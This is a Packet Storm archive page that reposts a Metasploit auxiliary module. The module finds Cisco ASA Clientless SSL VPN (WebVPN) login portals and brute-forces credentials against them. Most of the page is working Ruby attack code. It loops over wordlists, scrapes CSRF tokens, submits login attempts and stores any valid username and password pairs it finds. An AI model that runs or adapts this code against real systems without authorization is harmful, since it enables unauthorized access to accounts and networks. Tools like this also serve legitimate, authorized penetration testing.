what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility

Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility
Posted Sep 1, 2024
Authored by Jonathan Claudius, jbaines-r7 | Site metasploit.com

This Metasploit module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and performs login brute-force to identify valid credentials.

tags | exploit, web
systems | cisco
SHA-256 | 983f31bd8edeeb35f86c4eda6d8e40112b381f09fec355e208711ecccd89c799

Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
include Msf::Exploit::Deprecated
moved_from 'auxiliary/scanner/http/cisco_asa_asdm'

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility',
'Description' => %q{
This module scans for Cisco ASA Clientless SSL VPN (WebVPN) web login portals and
performs login brute-force to identify valid credentials.
},
'Author' => [
'Jonathan Claudius <jclaudius[at]trustwave.com>', # original Metasploit module
'jbaines-r7' # updated module
],
'References' => [
[ 'URL', 'https://www.cisco.com/c/en/us/support/docs/security-vpn/webvpn-ssl-vpn/119417-config-asa-00.html' ]
],
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)

register_options(
[
OptString.new('GROUP', [true, 'The connection profile to log in to (blank by default)', '']),
OptPath.new('USERPASS_FILE', [
false, 'File containing users and passwords separated by space, one pair per line',
File.join(Msf::Config.data_directory, 'wordlists', 'http_default_userpass.txt')
]),
OptPath.new('USER_FILE', [
false, 'File containing users, one per line',
File.join(Msf::Config.data_directory, 'wordlists', 'http_default_users.txt')
]),
OptPath.new('PASS_FILE', [
false, 'File containing passwords, one per line',
File.join(Msf::Config.data_directory, 'wordlists', 'http_default_pass.txt')
])
]
)
end

def run_host(_ip)
# Establish the remote host is running the clientless vpn
res = send_request_cgi('uri' => normalize_uri('/+CSCOE+/logon.html'))
if res && res.code == 200 && res.get_cookies.include?('webvpn')
print_status('The remote target appears to host Cisco SSL VPN Service. The module will continue.')
print_status('Starting login brute force...')

each_user_pass do |user, pass|
do_login(user, pass)
end
else
print_status('Cisco SSL VPN Service not detected on the remote target')
end
end

def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'Cisco ASA SSL VPN Service',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)

login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)

create_credential_login(login_data)
end

# Brute-force the login page
def do_login(user, pass)
vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}")

# some versions require we snag a CSRF token. So visit the logon portal
res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri('/+CSCOE+/logon.html'))
return unless res && res.code == 200

vars_hash = {
'tgroup' => '',
'next' => '',
'tgcookieset' => '',
'username' => user,
'password' => pass,
'Login' => 'Login'
}

cookie = 'webvpnlogin=1'

# the web portal may or may not contain CSRF tokens. So snag the token if it exists.
if res.body.include?('csrf_token')
csrf_token = res.body[/<input name="csrf_token" type=hidden value="(?<token>[0-9a-f]+)">/, :token]
if csrf_token
vars_hash['csrf_token'] = csrf_token
cookie = "#{cookie}; CSRFtoken=#{csrf_token};"
else
print_error('Failed to grab the CSRF token')
return
end
end

# only add the group if the user specifies a non-empty value
unless datastore['GROUP'].nil? || datastore['GROUP'].empty?
vars_hash['group_list'] = datastore['GROUP']
end

res = send_request_cgi({
'uri' => normalize_uri('/+webvpn+/index.html'),
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => cookie,
'vars_post' => vars_hash
})

# check if the user was likely forwarded to the clientless vpn page
if res && res.code == 200 && res.body.include?('/+webvpn+/webvpn_logout.html') && res.body.include?('/+CSCOE+/session.js')

print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body)

# logout - the default vpn connection limit is 2 so it's best to free this one up. Unfortunately,
# we need a CSRF and non-CSRF version for this as well.
if res.body.include?('csrf_token')
csrf_token = res.body[/<input type="hidden" name="csrf_token" value="(?<token>[0-9a-f]+)">/, :token]

# if we don't pull out the token... just keep going? Failing logout isn't the end of the world.
if csrf_token
send_request_cgi(
'uri' => normalize_uri('/+webvpn+/webvpn_logout.html'),
'method' => 'POST',
'vars_post' => { 'csrf_token' => csrf_token },
'cookie' => res.get_cookies
)
end
else
send_request_cgi('uri' => normalize_uri('/+webvpn+/webvpn_logout.html'), 'cookie' => res.get_cookies)
end

return :next_user
else
vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close